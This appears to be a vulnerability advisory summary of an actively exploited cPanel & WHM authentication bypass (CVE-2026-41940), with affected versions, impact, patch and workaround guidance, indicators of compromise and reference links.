Full Report
Exploitation was underway before patches landed, at least one victim reports ransomware demand CISA has added a critical cPanel bug to its known-exploited list, confirming that attackers are already poking holes in one of the internet's most widely used hosting stacks.…
Analysis Summary
# Vulnerability: Critical Authentication Bypass in cPanel & WHM
## CVE Details
- **CVE ID:** CVE-2026-41940
- **CVSS Score:** 9.8 (Critical)
- **CWE:** Authentication Bypass (Specific CWE not provided in text, but behavior indicates a failure in authentication validation).
## Affected Systems
- **Products:** cPanel, WebHost Manager (WHM), and WP Squared.
- **Versions:** All supported versions released after version 11.40.
- **Configurations:** Internet-exposed instances (approximately 1.5 million identified via Shodan).
## Vulnerability Description
The vulnerability is a critical authentication bypass flaw that allows an unauthenticated remote attacker to gain full administrative control (root-level access) over the hosting server. By bypassing the primary security layer of the cPanel/WHM stack, attackers can execute arbitrary commands, manage files, and access all hosted accounts on the affected machine.
## Exploitation
- **Status:** Exploited in the wild (Confirmed by CISA and hosting providers).
- **Complexity:** Low (Implied by the scale of automated attacks and CVSS score).
- **Attack Vector:** Network (Remote).
## Impact
- **Confidentiality:** Total (Full access to all server and user data).
- **Integrity:** Total (Ability to modify system files, website content, and configurations).
- **Availability:** Total (Reported cases of ransomware encryption and service shutdowns by providers).
## Remediation
### Patches
- **cPanel/WHM:** Users must update to the latest patched versions released on or after Tuesday, April 28, 2026.
- **WP Squared:** Patches are available alongside the core cPanel updates.
### Workarounds
- **Access Control:** Restrict access to cPanel/WHM ports (e.g., 2082, 2083, 2086, 2087) via firewall/IP whitelisting.
- **Service Suspension:** Temporarily disable the cPanel/WHM interface until patches are applied (as seen with Namecheap’s response).
## Detection
- **Indicators of Compromise:**
- Evidence of ransomware (demands for payment, encrypted files).
- Unauthorized administrative login logs dating back as early as 2/23/2026.
- Presence of unknown administrative accounts or SSH keys.
- **Detection methods and tools:**
- Monitor server logs for unusual activity on WHM/cPanel administrative ports.
- Check for unauthorized cron jobs or web shells in user directories.
## References
- **CISA KEV Catalog:** hxxps[://]www[.]cisa[.]gov/known-exploited-vulnerabilities-catalog
- **Vendor Advisory (Rapid7):** hxxps[://]www[.]rapid7[.]com/blog/post/etr-cve-2026-41940-cpanel-whm-authentication-bypass/
- **NVD Entry:** hxxps[://]nvd[.]nist[.]gov/vuln/detail/CVE-2026-41940
- **Provider Status (Namecheap):** hxxps[://]www[.]namecheap[.]com/status-updates/ongoing-critical-security-vulnerability-in-cpanel-april-28-2026/